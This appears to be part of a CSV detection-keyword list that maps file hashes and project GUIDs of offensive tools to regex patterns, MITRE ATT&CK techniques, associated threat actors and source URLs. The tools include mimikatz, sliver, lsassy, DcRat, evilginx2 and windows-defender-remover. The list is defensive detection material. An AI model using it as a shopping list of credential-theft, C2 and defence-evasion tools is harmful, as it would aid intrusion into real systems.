"*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26625"
"*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26626"
"*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26627"
"*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26628"
"*51E46096-4A36-4C7D-9773-BC28DBDC4FC6*",".{0,1000}51E46096\-4A36\-4C7D\-9773\-BC28DBDC4FC6.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","26630"
"*51eb3cd6442c856ef7e5170818e5bcab3594d6b3473a380c9a1555ca1dc2eb87*",".{0,1000}51eb3cd6442c856ef7e5170818e5bcab3594d6b3473a380c9a1555ca1dc2eb87.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26632"
"*51ec632f44196675aac4e358940ac03d5a135a4d7dc150a5ee678203afec9fda*",".{0,1000}51ec632f44196675aac4e358940ac03d5a135a4d7dc150a5ee678203afec9fda.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","26633"
"*51ed625d1ce0d7de0a2cb6b61254c926154edd760f596eba6ef8bc6a50242108*",".{0,1000}51ed625d1ce0d7de0a2cb6b61254c926154edd760f596eba6ef8bc6a50242108.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","26634"
"*51ed625d1ce0d7de0a2cb6b61254c926154edd760f596eba6ef8bc6a50242108*",".{0,1000}51ed625d1ce0d7de0a2cb6b61254c926154edd760f596eba6ef8bc6a50242108.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","26635"
"*51ef910e61dfc492f4e1e1ad115b1c600175cffa379ae8a7035e6ba016ec7af5*",".{0,1000}51ef910e61dfc492f4e1e1ad115b1c600175cffa379ae8a7035e6ba016ec7af5.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","26636"
"*51f92adcb4397e57d3809d3fa76bbf2cfb8ca772551b755ea8b0b3a6ba316334*",".{0,1000}51f92adcb4397e57d3809d3fa76bbf2cfb8ca772551b755ea8b0b3a6ba316334.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","#filehash","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","26638"
"*51fecfd2da4eb46257e94548af984f53d88be1e8d476ef0bc64a801588dbb6b5*",".{0,1000}51fecfd2da4eb46257e94548af984f53d88be1e8d476ef0bc64a801588dbb6b5.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","26639"
"*52023815505f6a4a8e5a2c97c53ea87440261a404c639922f16899c859f596b9*",".{0,1000}52023815505f6a4a8e5a2c97c53ea87440261a404c639922f16899c859f596b9.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26641"
"*52040049-D7FC-4C72-B6AE-BD2C7AB27DEE*",".{0,1000}52040049\-D7FC\-4C72\-B6AE\-BD2C7AB27DEE.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#GUIDproject","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","26642"
"*520411a91c6021dba0746e4520bb495db8d7c71c7b1813a95b9aae26531d493a*",".{0,1000}520411a91c6021dba0746e4520bb495db8d7c71c7b1813a95b9aae26531d493a.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","26643"
"*52083b583a80716b034b5ea9c98d0070091d63c2a13771afa42268cec2de7b1d*",".{0,1000}52083b583a80716b034b5ea9c98d0070091d63c2a13771afa42268cec2de7b1d.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","26645"
"*520f529151f419ccb0e75d9f9d2c9a24fb4809468dbd95360e4483672db46407*",".{0,1000}520f529151f419ccb0e75d9f9d2c9a24fb4809468dbd95360e4483672db46407.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","26646"
"*52136cb222124a4b78b9cef3b9bd9e1a18a6687043597cb95138aa60bd26c76a*",".{0,1000}52136cb222124a4b78b9cef3b9bd9e1a18a6687043597cb95138aa60bd26c76a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26647"
"*522690525ad617c5995ee43c1efcf7c4e43750e9118825f054cc2136e19d93a9*",".{0,1000}522690525ad617c5995ee43c1efcf7c4e43750e9118825f054cc2136e19d93a9.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26649"
"*522b08b506889d8b54c8e93b2c41e799bb49da1dde0176a2a97f52125a63898e*",".{0,1000}522b08b506889d8b54c8e93b2c41e799bb49da1dde0176a2a97f52125a63898e.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#filehash","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","26650"
"*523b8ef87cf347612d09851f689f5cf3a2a70eb32f392ae5bc7e5ab5fd961cca*",".{0,1000}523b8ef87cf347612d09851f689f5cf3a2a70eb32f392ae5bc7e5ab5fd961cca.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","26651"
"*5241f01eb654fe100e0c2a973b7f2443e7bcd914e5b388cc07031871a7d4d199*",".{0,1000}5241f01eb654fe100e0c2a973b7f2443e7bcd914e5b388cc07031871a7d4d199.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","26652"
"*5248816fad594b75b1f9c63e79ad931f24a346915c7ba2c50035e5c13cced4cf*",".{0,1000}5248816fad594b75b1f9c63e79ad931f24a346915c7ba2c50035e5c13cced4cf.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","26654"
"*5248c404dc6560429ff7d6c2fb4cd2dcb379fb9b9c410ddf3f10da2733744cfd*",".{0,1000}5248c404dc6560429ff7d6c2fb4cd2dcb379fb9b9c410ddf3f10da2733744cfd.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26655"
"*524b9d99ab1bd72dd6b227ffc77c539c6abca8d429f56483dae709bc96e445dc*",".{0,1000}524b9d99ab1bd72dd6b227ffc77c539c6abca8d429f56483dae709bc96e445dc.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","26656"
"*52582ba941f62cf6c7ece84074c42ac60e520be9ab3ab35151dde34e2c1bdf95*",".{0,1000}52582ba941f62cf6c7ece84074c42ac60e520be9ab3ab35151dde34e2c1bdf95.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26658"
"*525bb5e67378b9bdc298aceb9e0108603741ae334e8ce748222999fcb2f1d818*",".{0,1000}525bb5e67378b9bdc298aceb9e0108603741ae334e8ce748222999fcb2f1d818.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","#filehash","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","26659"
"*525bb5e67378b9bdc298aceb9e0108603741ae334e8ce748222999fcb2f1d818*",".{0,1000}525bb5e67378b9bdc298aceb9e0108603741ae334e8ce748222999fcb2f1d818.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","26660"
"*525fe993592ba892d62bba7abc5c364dbcbb82123ca76fccbb8993751e32a748*",".{0,1000}525fe993592ba892d62bba7abc5c364dbcbb82123ca76fccbb8993751e32a748.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26661"
"*52652191dd5bb9e3974cb1c62bc46968e94ad4c67b84a2a330ebaec19a0fd18b*",".{0,1000}52652191dd5bb9e3974cb1c62bc46968e94ad4c67b84a2a330ebaec19a0fd18b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26663"
"*52652b9d89a6fd0617b8f0f60b0abef4a972fc0b7f1f861e5be029f7b2eb4dce*",".{0,1000}52652b9d89a6fd0617b8f0f60b0abef4a972fc0b7f1f861e5be029f7b2eb4dce.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","26664"
"*526a14c1b561a020b7544843883117037131175b38109000b4848ea1c7963bf4*",".{0,1000}526a14c1b561a020b7544843883117037131175b38109000b4848ea1c7963bf4.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","26665"
"*526f652d4d9e20a19374817eac75b914b75f3bfaecc16b65f979e5758ea62476*",".{0,1000}526f652d4d9e20a19374817eac75b914b75f3bfaecc16b65f979e5758ea62476.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","#filehash","N/A","10","2","158","34","2024-12-07T01:52:58Z","2023-09-21T02:09:48Z","26666"
"*526feda402303812eac1b6663f2de7deac3bb433fcb9855625ff7d8201245416*",".{0,1000}526feda402303812eac1b6663f2de7deac3bb433fcb9855625ff7d8201245416.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","26667"
"*5279c364b478709ef9b1a7024343e62e341378132c81897e7be92a3bc629ec52*",".{0,1000}5279c364b478709ef9b1a7024343e62e341378132c81897e7be92a3bc629ec52.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26669"
"*527c7882ae3e01133e4230620d1435c40bfbd258fefc39cab74329a20fd0cf04*",".{0,1000}527c7882ae3e01133e4230620d1435c40bfbd258fefc39cab74329a20fd0cf04.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#filehash","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","26670"
"*527e1f97594b67b082c6d687fb93e15c1409bbfcf6584aa019260a27af027262*",".{0,1000}527e1f97594b67b082c6d687fb93e15c1409bbfcf6584aa019260a27af027262.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","26672"
"*528de69797c36423a1e6b64fa8b1825f354e6707f2ca3760d81a9f58d69d58bb*",".{0,1000}528de69797c36423a1e6b64fa8b1825f354e6707f2ca3760d81a9f58d69d58bb.{0,1000}","offensive_tool_keyword","rdpv","RemoteDesktopPassView is a small utility that reveals the password stored by Microsoft Remote Desktop Connection utility inside the .rdp files.","T1110 - T1560.001 - T1555.003 - T1212","TA0006 - TA0007","N/A","Phobos - GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/remote_desktop_password.html","1","0","#filehash","N/A","8","10","N/A","N/A","N/A","N/A","26674"
"*52907aebc7d2c6534099d149e61bf294b0ddf7d4e814a72b3621e3a829f83c97*",".{0,1000}52907aebc7d2c6534099d149e61bf294b0ddf7d4e814a72b3621e3a829f83c97.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","#filehash","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","26675"
"*529b3883e56855e121fb77dc6254cf1280964b9323c71f631068c3ac6be9c4cb*",".{0,1000}529b3883e56855e121fb77dc6254cf1280964b9323c71f631068c3ac6be9c4cb.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#filehash","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","26676"
"*529ba3d890cc8600221841ecc3fd4419c4e4c6cfcf655df163da2805a57db7a5*",".{0,1000}529ba3d890cc8600221841ecc3fd4419c4e4c6cfcf655df163da2805a57db7a5.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","26677"
"*529feaedec43ba6c1c4b0c31ab57575e6751fa894c90364ba81732de04bb3b44*",".{0,1000}529feaedec43ba6c1c4b0c31ab57575e6751fa894c90364ba81732de04bb3b44.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26678"
"*52b07bced660711b3aa82b4cbf40156689045bcd695df40b1376c76e172beb8d*",".{0,1000}52b07bced660711b3aa82b4cbf40156689045bcd695df40b1376c76e172beb8d.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","#filehash","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","26681"
